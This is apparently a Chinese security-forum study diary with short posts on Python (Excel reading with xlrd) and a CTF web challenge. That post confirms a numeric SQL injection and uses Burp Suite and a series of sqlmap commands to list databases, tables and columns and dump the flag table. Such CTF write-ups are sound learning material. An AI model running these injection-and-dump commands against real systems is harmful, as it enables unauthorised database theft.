安全矩阵

 找回密码
 立即注册
搜索
楼主: Martini

马璐学习日记

[复制链接]

23

主题

58

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
 楼主| 发表于 2022-1-29 02:55:51 | 显示全部楼层
本帖最后由 Martini 于 2022-5-19 08:38 编辑

序列解包
回复

使用道具 举报

23

主题

58

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
 楼主| 发表于 2022-2-1 19:20:56 | 显示全部楼层
本帖最后由 Martini 于 2022-5-19 08:38 编辑

实现字符串加密解密

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

23

主题

58

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
 楼主| 发表于 2022-2-20 21:58:09 | 显示全部楼层
python对excel表格处理
  1. import xlrd
  2. workbook = xlrd.open_workbook(filename=r'C:\Users\nudnik rihe\Desktop\test.xlsx')
  3. table = workbook.sheets()[0]
  4. row = table.nrows
  5. # 获取sheet中有效行数
  6. print(row)
  7. col = table.ncols
  8. # 获取sheet中有效列数
  9. print(col)
  10. num = table.row_len(0)
  11. # 返回该行的有效单元格长度,获取一行中有多少列数据
  12. print(num)
  13. table_list = table.row_values(rowx=0, start_colx=0, end_colx=None)
  14. #获取指定行中所有的数据
  15. # rowx表示是获取第几行的数据
  16. # start_col表示从索引为多少开始,end_colx表示从索引为多少结束,
  17. # end_colx为None表示结束没有限制
  18. # 获取指定行中的数据并以列表的形式返回
  19. print(table_list)
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

23

主题

58

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
 楼主| 发表于 2022-3-13 15:18:56 | 显示全部楼层
本帖最后由 Martini 于 2022-3-13 15:21 编辑


有对话框第一时间想到是不是存在注入
输入1有返回页面
输入1'无返回值
输入1 and 1=1有返回值 为数字型注入
burpsuite抓包
copy to file存为1.txt
kali执行sqlmap -r"1.txt" -p id -dbs

得到数据库为skctf
查看表名 执行sqlmap -r"1.txt" -p id -D skctf --tables

得到表名为sc和fl4g
查看字段 执行sqlmap -r"1.txt" -p id -D skctf -T fl4g --columns

列出字段信息 执行sqlmap -r"1.txt" -p id -D skctf -T fl4g -C skctf_flag --dump

得到flag

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

23

主题

58

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
 楼主| 发表于 2022-3-21 21:53:50 | 显示全部楼层

一道有关url编码的web题

本帖最后由 Martini 于 2022-5-19 08:41 编辑


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

23

主题

58

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
 楼主| 发表于 2022-3-25 10:54:56 | 显示全部楼层
本帖最后由 Martini 于 2022-5-19 08:41 编辑

将type里的“password”修改为“text”

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-21 00:02 , Processed in 0.017174 second(s), 16 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表